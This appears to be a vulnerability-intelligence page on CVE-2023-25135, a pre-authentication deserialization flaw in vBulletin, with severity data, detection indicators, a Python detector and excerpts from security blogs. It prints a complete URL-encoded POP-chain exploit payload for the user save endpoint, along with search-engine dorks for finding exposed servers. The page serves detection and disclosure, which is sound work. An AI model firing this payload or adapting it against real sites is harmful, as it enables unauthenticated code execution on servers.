CVE-2023-25135
Published 2023-02-03
Priority P188 · critical · 9.8 (CVSS 3.1)
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
ITW exploit · VulnCheck KEV · Initial access
Exploited in the wild
EPSS 23.93% (97.6th percentile)
vBulletin before 5.6.9 PL1 allows an unauthenticated remote attacker to execute arbitrary code via a crafted HTTP request that triggers deserialization. This occurs because verify_serialized checks that a value is serialized by calling unserialize and then checking for errors. The fixed versions are 5.6.7 PL1, 5.6.8 PL1, and 5.6.9 PL1.
Affected (3 ranges)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| vbulletin | vbulletin | — | — |
| vbulletin | vbulletin | — | — |
| vbulletin | vbulletin | — | — |
Detection & IOCs (extracted from sources)
URL: /ajax/api/user/save
Payload parameter (command): `user[searchprefs]=a%3a2%3a{i%3a0%3bO%3a27%3a"googlelogin_vendor_autoload"%3a0%3a{}i%3a1%3bO%3a32%3a"Monolog\Handler\SyslogUdpHandler"%3a1%3a{s%3a9%3a"%00*%00socket"%3bO%3a29%3a"Monolog\Handler\BufferHandler"%3a7%3a{s%3a10%3a"%00*%00handler"%3br%3a4%3bs%3a13%3a"%00*%00bufferSize"%3bi%3a-1%3bs%3a9%3a"%00*%00buffer"%3ba%3a1%3a{i%3a0%3ba%3a2%3a{i%3a0%3bs%3a14%3a"CVE-2023-25135"%3bs%3a5%3a"level"%3bN%3b}}s%3a8%3a"%00*%00level"%3bN%3bs%3a14%3a"%00*%00initialized"%3bb%3a1%3bs%3a14%3a"%00*%00bufferLimit"%3bi%3a-1%3bs%3a13%3a"%00*%00processors"%3ba%3a2%3a{i%3a0%3bs%3a7%3a"current"%3bi%3a1%3bs%3a8%3a"var_dump"%3b}}}`
YARA rule: strings containing a serialized object of type PDOStatement or Monolog\Handler\SyslogUdpHandler
- The exploit payload uses serialized Monolog\Handler\SyslogUdpHandler and Monolog\Handler\BufferHandler PHP objects chained together as a POP chain to achieve RCE via the verify_serialized() deserialization flaw.
- Successful exploitation produces a response body containing 'string(14)' and '"CVE-2023-25135"' with HTTP 200 and Content-Type application/json; use these as detection matchers.
- GreyNoise tagged active scanning/exploitation attempts for this CVE as 'vBulletin Remote Command Execution CVE-2023-25135 Attempt'; monitor for this tag to identify attacking IPs.
- Shodan/FOFA/Google dorks can identify exposed vBulletin instances as attack surface: search for http.component:"vBulletin", body="powered by vbulletin", or intext:"Powered By vBulletin".
- CVE-2023-25135 exploitation attempts were also observed in the wild alongside CVE-2023-6933 WordPress attacks, indicating opportunistic mass scanning.
- The deserialization vulnerability exists in the verify_serialized() function, which calls PHP's unserialize() to check whether data is serialized; this is the root cause enabling the POP chain exploitation.
- Directly deserializing a PDOStatement object does not lead to code execution on its own; a full RCE requires a suitable POP chain (e.g., Monolog handlers) present in the vBulletin framework.
- Affected versions are vBulletin 5.6.0 through 5.6.8; fixed versions are 5.6.7 PL1, 5.6.8 PL1, and 5.6.9 PL1.
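As an added illustration (not code from the page or from any of the cited sources), the request-side markers above (the /ajax/api/user/save endpoint, the user[searchprefs] parameter, and serialized objects of the PDOStatement or Monolog handler classes) and the response-side matchers can be turned into a small Python detector; the watch list, function names and sample bodies below are assumptions constructed for the example.

```python
import re
from urllib.parse import parse_qs

# Object classes named by the YARA description and POP-chain notes above.
WATCHED_CLASSES = {
    "PDOStatement",
    "Monolog\\Handler\\SyslogUdpHandler",
    "Monolog\\Handler\\BufferHandler",
}
# Header of a PHP serialized object: O:<name length>:"<class name>":
PHP_OBJECT_RE = re.compile(r'O:\d+:"([^"]+)":')

def serialized_objects(value):
    """Class names of every PHP object header found in a decoded string."""
    return PHP_OBJECT_RE.findall(value)

def inspect_request(path, body):
    """Return a finding for a request to /ajax/api/user/save whose
    user[searchprefs] value embeds objects of watched classes, else None.
    parse_qs percent-decodes the value (including %3a, %3b and %00)."""
    if not path.startswith("/ajax/api/user/save"):
        return None
    params = parse_qs(body, keep_blank_values=True)
    for raw in params.get("user[searchprefs]", []):
        hits = sorted(set(serialized_objects(raw)) & WATCHED_CLASSES)
        if hits:
            return {"param": "user[searchprefs]", "classes": hits}
    return None

def response_indicates_success(status, content_type, body):
    """Response-side matchers listed above: HTTP 200, a JSON body holding
    var_dump output 'string(14)' and the literal "CVE-2023-25135"."""
    return (status == 200 and content_type.startswith("application/json")
            and "string(14)" in body and '"CVE-2023-25135"' in body)

# Constructed sample bodies (not captured traffic): a legitimate preference
# save serializes only scalars; the second carries a bare object header of
# a watched class, which is the marker a detector keys on, not a chain.
BENIGN_BODY = 'user[searchprefs]=a%3a1%3a{i%3a0%3bs%3a5%3a"title"%3b}'
SUSPECT_BODY = ('user[searchprefs]=a%3a1%3a{i%3a0%3bO%3a32%3a'
                '"Monolog\\Handler\\SyslogUdpHandler"%3a0%3a{}}')

if __name__ == "__main__":
    for label, body in (("benign", BENIGN_BODY), ("suspect", SUSPECT_BODY)):
        print(label, inspect_request("/ajax/api/user/save", body))
```

In a proxy or WAF log pipeline the same two functions would run over the decoded request body and the paired response, so a hit on both sides distinguishes a successful exploit from mere scanning.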
CVSS provenance
NVD (v3.1): 9.8 CRITICAL, CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
VulnCheck: 9.8 CRITICAL
GHSA
GHSA-r8jw-f89q-p7g6: vBulletin before 5 (CVE-2023-25135, CRITICAL, CWE-502)
ghsa_unreviewed · 2023-02-03
VulnCheck
vBulletin vBulletin Deserialization of Untrusted Data (CVE-2023-25135, CRITICAL)
vulncheck · 2023 · CVSS 9.8
Affected: vBulletin vBulletin
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2023-12-04&host_type=src&vulnerability=cve-2023-25135; https://dashboard.shadowserver.org/statistics/honeypot/vulne
No detection rules found.
Nuclei
vBulletin <= 5.6.9 - Pre-authentication Remote Code Execution (CVE-2023-25135, CRITICAL)
nuclei · CVSS 9.8
Template (truncated on the page):

```yaml
id: CVE-2023-25135
info:
  name: vBulletin <= 5.6.9 - Pre-authentication Remote Code Execution
  author: iamnoooob,rootxharsh,pdresearch
  severity: critical
  description: |
    vBulletin before 5.6.9 PL1 allows an unauthenticated remote attacker to execute arbitrary code via a crafted HTTP request that triggers deserialization. This occurs because verify_serialized checks that a value is serialized by calling unserialize and then checking for errors.
```
Bleepingcomputer
Hackers target WordPress database plugin active on 1 million sites (CRITICAL)
blogs_bleepingcomputer · 2024-01-25 · CVSS 9.8
By Bill Toulas
Malicious activity targeting a critical severity flaw in the ‘Better Search Replace’ WordPress plugin has been detected, with researchers observing thousands of attempts in the past 24 hours.
Better Search Replace is a WordPress plugin with more than one million installations that helps with search and replace operations in databases when moving websites to new domains or servers.
Admins can use it to search and replace specific text in the database or handle serialized data, and it provides selective replacement options, support for WordPress Multisite, and also includes a “dry run” option to make sure that everything works fine.
The plugin vendor, WP Engine, released version 1.4.5 last week to addre
Sentinelone
CVE-2023-25135: vBulletin Remote Code Execution Vulnerability (CRITICAL)
blogs_sentinelone · 2023-05-16 · CVSS 9.8
vBulletin, a popular software for building dynamic online communities and forums, has been discovered to house a severe security vulnerability. This critical flaw, CVE-2023-25135, affects vBulletin versions 5.6.0 through 5.6.8. The potential security risk is immense, given its broad usage across numerous online forums.
The severity of CVE-2023-25135 is considered Critical, as it allows a remote attacker to execute arbitrary code on a vulnerable system. On March 8, 2023, vBulletin acknowledged this vulnerability and swiftly issued security updates to mitigate it. Exploiting this Remote Code Execution (RCE) vulnerability occurs when a specifically crafted request is dispatched to the vBulletin server, escalating the potential damage to the compromised system.
The risk associated with CVE-2023
Sentinelone
PaperCut Vulnerability: Unpatched Servers Exploited in the Wild (CVE-2023-27350, CRITICAL)
blogs_sentinelone · 2023-05-04 · CVSS 9.8
On March 8, 2023, PaperCut fixed two new vulnerabilities, CVE-2023-27350 and CVE-2023-27351. These problems could have allowed an attacker to take control of the PaperCut server from a remote location.
CVE-2023-27350 is a vulnerability that allows remote attackers to bypass authentication on affected installations of PaperCut NG version 8.0 or later on all OS platforms. Authentication is not required to exploit this vulnerability. The specific flaw exists within the SetupCompleted class. The issue results from improper access control.
This critical-rated vulnerability carries a severity score of 9.8 out of 10, indicating its high potential for damage if exploited.
Another vulnerability in PaperCut, CVE-2023-27351, could allow unauthorized attackers to access and extract sensitive user a
Greynoiseio
GreyNoise Round Up: Product Updates
blogs_greynoiseio
Greynoiseio
NoiseLetter
blogs_greynoiseio
References:
- https://forum.vbulletin.com/forum/vbulletin-announcements/vbulletin-announcements_aa/4473890-vbulletin-5-6-9-security-patch
- https://www.ambionics.io/blog/vbulletin-unserializable-but-unreachable